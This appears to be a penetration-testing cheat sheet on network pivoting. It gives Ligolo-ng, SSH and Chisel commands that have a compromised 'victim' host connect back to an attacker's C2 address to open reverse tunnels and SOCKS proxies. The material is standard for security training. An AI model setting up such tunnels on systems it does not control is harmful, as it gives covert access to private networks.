Ligolo-ng

1. Download

Proxy - architecture for attacker machine.
Agent - architecture for victim machine.

2. Run proxy

sudo ./proxy -selfcert

3. Run agent

./agent -connect <C2_IP>:11601 -ignore-cert

4. Configure tunnel

ligolo-ng » session - select session
ligolo-ng » autoroute

5. Local Port Forwarding

After connecting agent to proxy:

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
ip route add 240.0.0.1/32 dev ligolo

SSH Port Forwarding

1. Local Port Forwarding

Port 80 visible on victim machine, tunneling to port 8080 attacker machine.

ssh -L <IP>:8080:<IP>:80 <USER>@<IP>

In browser http://localhost:8080

Chisel

1. Download

Client, Server, must be the same version.

2. Reverse - SOCKS

Attacker machine:

./chisel server -p 8080 --reverse

Victim machine:

./chisel client <C2_IP>:8080 R:socks

3. SOCKS

Victim machine:

./chisel server -v -p 8080 --socks5

Attacker machine:

./chisel client -v 10.10.10.10:8080 socks

4. Port forwarding

Attacker machine:

./chisel server -p 12312 --reverse

Victim machine:

/chisel client <C2_IP>:12312 R:4505:127.0.0.1:4505

Tunneling

Ligolo-ng#

1. Download#

2. Run proxy#

3. Run agent#

4. Configure tunnel#

5. Local Port Forwarding#

SSH Port Forwarding#

1. Local Port Forwarding#

Chisel#

1. Download#

2. Reverse - SOCKS#

3. SOCKS#

4. Port forwarding#

Ligolo-ng

1. Download

2. Run proxy

3. Run agent

4. Configure tunnel

5. Local Port Forwarding

SSH Port Forwarding

1. Local Port Forwarding

Chisel

1. Download

2. Reverse - SOCKS

3. SOCKS

4. Port forwarding